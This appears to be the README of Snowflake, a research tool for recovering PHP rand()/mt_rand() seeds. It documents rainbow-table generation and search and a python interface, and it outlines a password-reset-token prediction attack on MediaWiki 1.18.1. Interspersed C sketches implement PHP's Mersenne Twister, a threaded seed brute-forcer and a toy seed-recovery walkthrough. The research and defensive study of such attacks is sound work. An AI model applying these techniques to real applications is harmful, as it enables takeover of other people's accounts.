benhunter/Snowflake

*****--------------------------=== Snowflake ===--------------------------*****
-----*****-------------------------^^^^^^^^^-------------------------*****-----


SUMMARY
-------
Snowflakes are considered unique; a common saying asserts that no two are
identical. However, under specific conditions their shapes tend to be
predictable. For example, the shape of a snowflake is broadly determined by
the temperature and humidity at which it forms.

Snowflake is a framework that assists in exploiting randomness
vulnerabilities in PHP applications; in particular, it helps with the
implementation of seed recovery attacks.
For more information on these attacks, see the paper
"I Forgot Your Password: Randomness Attacks Against PHP Applications".

This release includes the standalone snowflake cracking tool and its python
interface, a sample password reset exploit against mediawiki 1.18.1 that
demonstrates the process of writing such exploits, and a stripped-down version
of the mt_rand() function from the PHP sources.



INSTALLATION
------------
Installing snowflake is straightforward. Just run make in the top-level
directory; all binaries and libraries will be compiled, along with the hash
library needed by the included mediawiki sample exploit.

The snowflake executable and library will be placed in the release directory,
while the hash library for the mediawiki exploit will be placed in the
exploits directory.

Snowflake has no unusual dependencies, so it should compile successfully on
any Unix system.


Using snowflake
---------------
For those familiar with hash cracking tools, snowflake follows an architecture
similar to that of the RainbowCrack tool.

The user writes a hash function (which is application dependent) and compiles
it as a shared library, taking care to export the necessary information (see
below). The function takes a 32-bit integer (the seed) as input and returns an
arbitrary output (as a char *).

Note that we use the term hash function loosely: the function need not reduce
the input length or have any other property typically associated with hash
functions (e.g., collision resistance).

Afterwards, snowflake can do the following with this hash function:
1. Generate rainbow tables covering all 2^32 possible seeds.
2. Search given rainbow tables for a target hash.
3. Perform an online brute-force search over all 2^32 seeds to find a target hash.

In addition, the python interface lets a user perform actions 2 and 3 from a
python script, which makes them much easier to use from within a python
exploit.

**** Defining a hash function ****

To define a new hash function, write the function itself and then define an
array of hashFuncEntry named hashFuncArray that holds the information
snowflake needs about the hash function.

The hashFuncEntry type is defined as follows:

typedef struct {
  char *hashName;
  char *(*hashFunc)(unsigned int, char *);
  unsigned int hashLen;
} hashFuncEntry;


where hashName is the name of the hash function as passed to snowflake,
hashFunc is a pointer to the function, and hashLen is the length (in bytes) of
the hashes that this function produces.

Here is an example from the mediawiki hash function:
hashFuncEntry hashFuncArray[] = { // this symbol will be exported.
  {"wikihash",     mediawikiHash,    16},
  {0,         0,      0},        // terminated by a zero entry.
};

The array must always be terminated by an all-zero entry; a single library may
contain more than one hash function.

The hash function should have the following signature:

char *mediawikiHash(unsigned int seed, char hash[])

The second argument must be an array large enough to hold the hash, and the
function should also return a pointer to that array.
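Putting these pieces together, a complete hash library might look like the minimal sketch below. The function toyHash and the name "toyhash" are hypothetical: toyHash derives 8 raw bytes from the seed with the SplitMix64 finalizer, standing in for code that reproduces whatever the target application leaks. The hashFuncEntry definition is copied from above, and the build command in the comment assumes gcc and a source file named toyhash.c.

```c
/* Minimal hashlib sketch. toyHash and "toyhash" are hypothetical: the
 * function stands in for code that reproduces what the target application
 * leaks right after its generator has been seeded.
 *
 * Build (file name assumed): gcc -shared -fPIC -O2 -o hashlib0.so toyhash.c
 */
#include <stdint.h>

/* Same layout as the hashFuncEntry type snowflake expects. */
typedef struct {
  char *hashName;
  char *(*hashFunc)(unsigned int, char *);
  unsigned int hashLen;
} hashFuncEntry;

/* Writes 8 raw bytes derived from the seed (SplitMix64 finalizer) into
 * hash and returns hash. All state is local, so concurrent calls from
 * several cracking threads do not interfere with each other. */
char *toyHash(unsigned int seed, char hash[]) {
  uint64_t z = (uint64_t)seed + 0x9e3779b97f4a7c15ULL;
  z = (z ^ (z >> 30)) * 0xbf58476d1ce4e5b9ULL;
  z = (z ^ (z >> 27)) * 0x94d049bb133111ebULL;
  z ^= z >> 31;
  for (int i = 0; i < 8; i++)            /* big-endian byte order */
    hash[i] = (char)(z >> (56 - 8 * i));
  return hash;                           /* contract: return the buffer */
}

/* Exported symbol: one entry per hash function, zero-terminated. */
hashFuncEntry hashFuncArray[] = {
  {"toyhash", toyHash, 8},
  {0, 0, 0},
};
```

Keeping all generator state in local variables is a deliberate choice here: the cracker calls the hash function from several threads at once, so shared global state would make results unreliable.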

Next, compile the code as a shared library placed in the same directory as
snowflake. The library file must be named hashlibN.so, where N is the number of
the library and can range from 0 to 10, e.g. hashlib0.so.

When writing hash functions that use the mt_rand generator, you can use the
stripped-down version included in the mt_rand directory. This is a standalone
implementation of the mt_rand function extracted from the PHP sources.
Depending on the hash function, you may be able to apply additional
optimizations to improve performance (e.g., see the mediawiki hash function in
hashlibs/mwikihash.c).
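For reference, here is a sketch of PHP's Mersenne Twister modeled on the PHP 5.x code in ext/standard/rand.c; it is not the bundled mt_rand directory, so compare it against that stripped version before relying on it. The php_mode flag selects between PHP 5's twist, which takes the low bit from u where the reference MT19937 takes it from v, and the reference algorithm. The names mt_state, mt_seed, mt_next and php_mt_rand_value are hypothetical.

```c
#include <stdint.h>

#define MT_N 624
#define MT_M 397

typedef struct {
  uint32_t s[MT_N];
  int left;        /* outputs remaining before the next reload */
  uint32_t *next;  /* next state word to temper */
  int php_mode;    /* 1: PHP 5 twist, 0: reference MT19937 */
} mt_state;

static uint32_t twist(const mt_state *st, uint32_t m, uint32_t u, uint32_t v) {
  uint32_t mix = (u & 0x80000000U) | (v & 0x7FFFFFFFU);
  /* PHP 5 takes the low bit from u; the reference algorithm uses v. */
  uint32_t lo = st->php_mode ? (u & 1U) : (v & 1U);
  return m ^ (mix >> 1) ^ (lo ? 0x9908B0DFU : 0U);
}

/* Regenerates all 624 state words in place. */
static void mt_reload(mt_state *st) {
  uint32_t *p = st->s;
  int i;
  for (i = MT_N - MT_M; i--; ++p) *p = twist(st, p[MT_M], p[0], p[1]);
  for (i = MT_M; --i; ++p) *p = twist(st, p[MT_M - MT_N], p[0], p[1]);
  *p = twist(st, p[MT_M - MT_N], p[0], st->s[0]);
  st->left = MT_N;
  st->next = st->s;
}

/* Initialises the state from a 32-bit seed, then reloads immediately. */
void mt_seed(mt_state *st, uint32_t seed, int php_mode) {
  st->php_mode = php_mode;
  st->s[0] = seed;
  for (int i = 1; i < MT_N; i++)
    st->s[i] = 1812433253U * (st->s[i - 1] ^ (st->s[i - 1] >> 30)) + (uint32_t)i;
  mt_reload(st);
}

/* Returns the next tempered 32-bit output. */
uint32_t mt_next(mt_state *st) {
  if (st->left == 0) mt_reload(st);
  --st->left;
  uint32_t y = *st->next++;
  y ^= y >> 11;
  y ^= (y << 7) & 0x9D2C5680U;
  y ^= (y << 15) & 0xEFC60000U;
  return y ^ (y >> 18);
}

/* What PHP 5's mt_rand() returns when called without arguments. */
uint32_t php_mt_rand_value(mt_state *st) { return mt_next(st) >> 1; }
```

With php_mode = 0 and seed 5489, the first mt_next() output is 3499211612, the well-known first output of the reference MT19937, which makes a convenient sanity check.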

For hash functions that use rand(), you may use the standard libc
implementation. Note that attacking rand() on Windows is trivial: the state of
its LCG is only 15 bits, which makes it easy to attack even by direct brute
force over the network.


Now we are ready to use the hash function with snowflake.

**** Generating rainbow tables ****

To generate rainbow tables we use the standalone snowflake tool. First,
however, we need to calculate the success probability of our tables; ideally
we would like our tables to have a 100% success probability. For this purpose
we can use the prob.py script, which calculates the success probability given
the parameters of each table and the total number of tables.
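The figures in the parameter table further down appear consistent with the standard success-probability estimate from Oechslin's rainbow table analysis. Assuming prob.py computes something of this kind (it may differ in details), the estimate can be sketched as follows, with N = 2^32 seeds, m chains per table, chain length t and l tables: m_1 = m, m_(i+1) = N(1 - e^(-m_i/N)), P_table = 1 - prod(1 - m_i/N), and P = 1 - (1 - P_table)^l. The function names are hypothetical, and 1 - e^(-x) is evaluated with its Taylor series so that the sketch needs no libm.

```c
/* 1 - e^(-x) via its Taylor series x - x^2/2! + x^3/3! - ...
   Accurate for 0 <= x <= 1, i.e. for m <= 2^32 chains. */
static double one_minus_exp_neg(double x) {
  double term = x, sum = 0.0;
  for (int k = 1; k < 30; k++) {
    sum += term;
    term *= -x / (k + 1);
  }
  return sum;
}

/* Estimated success probability of l tables, each with m chains of length t,
   over a 2^32 seed space. */
double success_probability(double m, int t, int l) {
  const double N = 4294967296.0;  /* 2^32 possible seeds */
  double miss = 1.0;              /* P(a given seed is missed by one table) */
  double mi = m;                  /* expected distinct points in column i */
  for (int i = 0; i < t; i++) {
    miss *= 1.0 - mi / N;
    mi = N * one_minus_exp_neg(mi / N);  /* merges shrink the next column */
  }
  double all_miss = 1.0;
  for (int j = 0; j < l; j++) all_miss *= miss;  /* tables are independent */
  return 1.0 - all_miss;
}
```

For example, success_probability(10e6, 1000, 3) should come out very close to the 0.990317 listed in the first row of that table.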


To generate one rainbow table with 10000000 entries and chain length 1000 we 
issue the following command:

snowflake generate 10000000 1000 1 myhashfunction

Check snowflake's usage menu for a detailed explanation of the command.

Because our search space is only 2^32, we can achieve a success probability of
almost one while keeping the tables moderately small and the chains short. Some
example parameters follow:

   Chains per table | Chain length | No. of tables | Success probability

       10m               1000             3             0.990317
       10m               3000             3             0.999879
       5m                3000             3             0.997676

Notice also that each chain entry is 64 bits (8 bytes), so a table with 10m
entries takes around 80 MB of space.
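One way such 64-bit entries can arise is shown in the following generic rainbow-table sketch: each chain is stored only as its 32-bit start seed and 32-bit end seed. This is not snowflake's code. The hash H (the SplitMix64 finalizer), the reduction R (fold the hash to 32 bits and add the column index) and the helper names are all hypothetical, and the table is scanned linearly where a real implementation would sort the entries by end point.

```c
#include <stddef.h>
#include <stdint.h>

/* One table entry: start and end seed of a chain, 2 x 32 = 64 bits. */
typedef struct { uint32_t start, end; } chain_entry;

/* Hypothetical target hash: SplitMix64 finalizer of the seed. */
static uint64_t H(uint32_t seed) {
  uint64_t z = (uint64_t)seed + 0x9e3779b97f4a7c15ULL;
  z = (z ^ (z >> 30)) * 0xbf58476d1ce4e5b9ULL;
  z = (z ^ (z >> 27)) * 0x94d049bb133111ebULL;
  return z ^ (z >> 31);
}

/* Hypothetical reduction: fold the hash to 32 bits and add the column
   index, so each column uses a different reduction function. */
static uint32_t R(uint64_t h, uint32_t col) {
  return (uint32_t)(h ^ (h >> 32)) + col;
}

/* Walks t hash/reduce steps from start and keeps only the end point. */
chain_entry make_chain(uint32_t start, uint32_t t) {
  uint32_t x = start;
  for (uint32_t i = 0; i < t; i++) x = R(H(x), i);
  chain_entry e = {start, x};
  return e;
}

/* Looks for a seed whose hash equals target; returns 1 and sets *seed. */
int lookup(const chain_entry *table, size_t n, uint32_t t, uint64_t target,
           uint32_t *seed) {
  for (uint32_t col = t; col-- > 0;) {      /* guess: target == H(x_col) */
    uint32_t x = R(target, col);
    for (uint32_t j = col + 1; j < t; j++) x = R(H(x), j);  /* walk to end */
    for (size_t k = 0; k < n; k++) {
      if (table[k].end != x) continue;
      uint32_t y = table[k].start;          /* rebuild the chain up to col */
      for (uint32_t j = 0; j < col; j++) y = R(H(y), j);
      if (H(y) == target) { *seed = y; return 1; }  /* else a false alarm */
    }
  }
  return 0;
}
```

A matching end point only means the target may lie in that chain, which is why the chain is regenerated and the hash rechecked before a seed is reported.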


**** Searching rainbow tables ****

In order to search a rainbow table for a target hash we issue the following 
command:

snowflake search rainbow_table_path target_hash

The hash should be given in human-readable hexadecimal form; snowflake
converts it to raw bytes. Importantly, all of the information about a rainbow
table is encoded in its filename, so the filename must stay intact; otherwise
you will run into all sorts of problems, ranging from errors to stack
overflows.
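A sketch of the hex-to-raw conversion described above, assuming the expected length comes from the hash function's hashLen. hex_to_raw and hexval are hypothetical helpers, not snowflake's own routines.

```c
#include <stddef.h>
#include <string.h>

/* Value of one hex digit, or -1 if c is not a hex digit. */
static int hexval(char c) {
  if (c >= '0' && c <= '9') return c - '0';
  if (c >= 'a' && c <= 'f') return c - 'a' + 10;
  if (c >= 'A' && c <= 'F') return c - 'A' + 10;
  return -1;
}

/* Converts a hex string into len raw bytes. Returns 0 on success, or -1 if
   hex is not exactly 2*len hex digits (out is never overrun). */
int hex_to_raw(const char *hex, unsigned char *out, size_t len) {
  if (strlen(hex) != 2 * len) return -1;
  for (size_t i = 0; i < len; i++) {
    int hi = hexval(hex[2 * i]), lo = hexval(hex[2 * i + 1]);
    if (hi < 0 || lo < 0) return -1;
    out[i] = (unsigned char)((hi << 4) | lo);
  }
  return 0;
}
```

Rejecting input whose length does not match is what keeps a malformed argument from writing past the output buffer.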

**** Cracking the hash online ****

If no tables are available, or the hash was not found in them, we can perform
an exhaustive search over all 2^32 possible seeds. To do so we issue the
command:

snowflake crack hash_func_name target_hash

The cracker is multithreaded and uses as many threads as there are CPU cores
in the system. With a 2.3 GHz quad-core processor we were able to search the
entire seed space for the mediawiki hash function in about 20 minutes.
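A multithreaded exhaustive search of this kind can be sketched with POSIX threads: the seed space is split among one thread per online core (as reported by sysconf(_SC_NPROCESSORS_ONLN), available on Linux and macOS), each thread scans every n-th seed, and a shared atomic flag stops the others once a match is found. toy_hash, job, worker and crack are hypothetical names, and toy_hash stands in for a real hash function. Compile with -pthread.

```c
#include <pthread.h>
#include <stdatomic.h>
#include <stdint.h>
#include <unistd.h>

#define MAX_THREADS 64

/* Hypothetical stand-in for a real hash function (SplitMix64 finalizer). */
static uint64_t toy_hash(uint32_t seed) {
  uint64_t z = (uint64_t)seed + 0x9e3779b97f4a7c15ULL;
  z = (z ^ (z >> 30)) * 0xbf58476d1ce4e5b9ULL;
  z = (z ^ (z >> 27)) * 0x94d049bb133111ebULL;
  return z ^ (z >> 31);
}

typedef struct {
  uint64_t target;
  uint64_t lo, hi;         /* half-open seed range [lo, hi) */
  unsigned tid, nthreads;  /* scans lo+tid, lo+tid+nthreads, ... */
  atomic_int *found;       /* shared stop flag */
  uint32_t *result;
} job;

static void *worker(void *arg) {
  job *jb = arg;
  for (uint64_t s = jb->lo + jb->tid; s < jb->hi; s += jb->nthreads) {
    if (atomic_load_explicit(jb->found, memory_order_relaxed)) break;
    if (toy_hash((uint32_t)s) == jb->target) {
      int expected = 0;    /* only the first finder writes the result */
      if (atomic_compare_exchange_strong(jb->found, &expected, 1))
        *jb->result = (uint32_t)s;
      break;
    }
  }
  return NULL;
}

/* Searches [lo, hi) with one thread per online core; returns 1 if found. */
int crack(uint64_t target, uint64_t lo, uint64_t hi, uint32_t *seed) {
  long ncpu = sysconf(_SC_NPROCESSORS_ONLN);
  unsigned n = ncpu < 1 ? 1 : (ncpu > MAX_THREADS ? MAX_THREADS : (unsigned)ncpu);
  pthread_t th[MAX_THREADS];
  int started[MAX_THREADS];
  job jobs[MAX_THREADS];
  atomic_int found = 0;
  for (unsigned k = 0; k < n; k++) {
    jobs[k] = (job){target, lo, hi, k, n, &found, seed};
    started[k] = pthread_create(&th[k], NULL, worker, &jobs[k]) == 0;
    if (!started[k]) worker(&jobs[k]);  /* fall back to running inline */
  }
  for (unsigned k = 0; k < n; k++)
    if (started[k]) pthread_join(th[k], NULL);
  return atomic_load(&found);
}
```

A full search would be crack(target, 0, 1ULL << 32, &seed); the range bounds are 64-bit so that 2^32 itself can serve as the exclusive upper bound.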



**** Using the python interface ****

Snowflake also includes a python module that exposes the search and crack
functionality to python scripts. The module uses ctypes to call the snowflake
library from within python.

In addition, the module includes a pure python implementation of the mt_rand
function as used by PHP. The mediawiki exploit is a nice showcase of how to use
both of these classes (see exploits/mediawiki.py).

First, import the classes:

from snowflake import MtRand, Snowflake


The Snowflake class provides the following methods:

-- __init__( clib = './snowflake.so' )
The class takes as an optional initialization argument the full path of the
snowflake shared library; otherwise it looks for snowflake.so in the current
directory.

-- searchRainbowTables( targetHash, tableList )
This function takes as input a targetHash (in raw byte form; you can use
binascii.unhexlify to convert a hex string) and a list of rainbow tables, and
tries to find the targetHash in each of these tables.

-- searchHashOnline( targetHash, hashFuncName )
Likewise, this function takes a targetHash in raw byte form and the name of the
hash function, and performs an exhaustive search to find the seed that
generated the target hash.


-- oneWayOrAnother( targetHash, tableList, hashFuncName )
This function is simply a wrapper around both of the above functions. It first
searches the given rainbow tables and, if the hash is not found, performs an
exhaustive search.


The MtRand class offers the following functions:

-- __init__( php = True )
At initialization the user needs to specify whether the class should use PHP's
Mersenne Twister implementation or the original Mersenne Twister
implementation. The differences between the two are explained in the paper.

-- mtSrand( seed )
Seeds the generator with the given seed using the PHP seeding algorithm.

-- mtRand( min = None, max = None)
Generates a random number using the original Mersenne Twister algorithm with an
option to map the number to a smaller range using the PHP truncation algorithm.

-- phpMtRand( min = None, max = None )
Generates a random number using the PHP Mersenne Twister implementation, again
giving the option to map the number to a smaller range.
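In PHP 5, the range mapping applied by mt_rand(min, max) is the RAND_RANGE macro: the 31-bit output is scaled into [min, max] rather than reduced modulo the range size. The sketch below assumes that macro's formula; php_rand_range and PHP_MT_RAND_MAX as written here are illustrative, not part of snowflake's python module.

```c
#include <stdint.h>

#define PHP_MT_RAND_MAX 0x7FFFFFFFL  /* largest value mt_rand() returns */

/* Scales a 31-bit generator value n into [min, max], following the
   formula of PHP 5's RAND_RANGE macro (scaling, not modulo). */
long php_rand_range(uint32_t n, long min, long max) {
  return min + (long)(((double)max - min + 1.0) * (n / (PHP_MT_RAND_MAX + 1.0)));
}
```

Because of the scaling, a value such as mt_rand(0, 99) is determined by the high-order bits of the raw output, not by its low digits.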


Writing exploits using snowflake
--------------------------------

Okay, now the interesting stuff. We now have everything we need to mount seed
recovery attacks against PHP applications that use either rand() or mt_rand().

The first thing we need to do is find a place within the application where
an output of the target function is leaked to the user in any form (it could
be a CSRF token, a randomly generated password, a password reset token; just
grep around...).

Next, we write some C code that reproduces this leak from a freshly seeded
generator. This code will serve as our hash function.

Then we generate some rainbow tables for this hash function and write an
exploit that forces Apache to spawn a new process, obtain a sample of our hash
function's output from it, and crack that sample with snowflake. This gives us
the initial seed that the target application used in that process.

Now we can reset the target user's password within the same connection
(remember: keep-alive is your friend!) and predict the token that will be
generated.

To find the token we create a new instance of the MtRand class and seed it with
the seed we obtained. Afterwards we can simply apply the same algorithm to 
predict the generated token.
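The whole process can be illustrated end to end with a toy generator in place of mt_rand(). Everything here is hypothetical: toy_rng is a 32-bit LCG (constants 1664525 and 1013904223) with an xorshift output step, victim models an application that leaks its first output and then spends the next two on a reset token, and recover_seed is a plain sequential search standing in for snowflake.

```c
#include <stdint.h>

/* Hypothetical toy generator standing in for mt_rand(). */
typedef struct { uint32_t s; } toy_rng;
static void toy_srand(toy_rng *r, uint32_t seed) { r->s = seed; }
static uint32_t toy_next(toy_rng *r) {
  r->s = r->s * 1664525u + 1013904223u;
  return r->s ^ (r->s >> 16);
}

/* Hypothetical application in a fresh process: the first output leaks
   (say, as a CSRF token); the next two form the password reset token. */
static void victim(uint32_t secret_seed, uint32_t *leak, uint32_t token[2]) {
  toy_rng r;
  toy_srand(&r, secret_seed);
  *leak = toy_next(&r);
  token[0] = toy_next(&r);
  token[1] = toy_next(&r);
}

/* Step 1: recover the seed from the leak (the role snowflake plays). */
static int recover_seed(uint32_t leak, uint64_t limit, uint32_t *seed) {
  for (uint64_t s = 0; s < limit; s++) {
    toy_rng r;
    toy_srand(&r, (uint32_t)s);
    if (toy_next(&r) == leak) { *seed = (uint32_t)s; return 1; }
  }
  return 0;
}

/* Step 2: replay the generator from the recovered seed, skipping the
   output already consumed by the leak, to predict the token. */
static void predict_token(uint32_t seed, uint32_t token[2]) {
  toy_rng r;
  toy_srand(&r, seed);
  (void)toy_next(&r);  /* the leaked value */
  token[0] = toy_next(&r);
  token[1] = toy_next(&r);
}
```

The skipped call in predict_token reflects why keep-alive matters: the leak and the token come from the same process, so the token is built from the outputs that follow the ones already consumed.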

For a code tutorial that illustrates the process in more detail, see the
mediawiki exploit.


LICENCE
-------

This software was written based on research funded by the ERC project CODAMODA
and is released under the New BSD License.

Acknowledgements
----------------

This research was partly supported by ERC project CODAMODA, #259152.

TODO / BUGS / ETC
-----------------

We think that the tool is quite usable by now. We will probably add
multithreaded rainbow table search to improve search time when complex hash
functions are used, although with every hash function we have used so far the
search time is under 1 minute.

In addition, this is an ALPHA release. You will probably find a number of bugs,
and we would be grateful if you reported them. However, please report only bugs
that occur when the user is not acting maliciously. If someone gets owned
because he opened a malicious rainbow table, so be it! Nevertheless, we will
probably fix some of these bugs too (when we find some spare time...).

Finally, if anybody wants to contribute some code too, she is more than welcome
to do so.

Happy exploitation!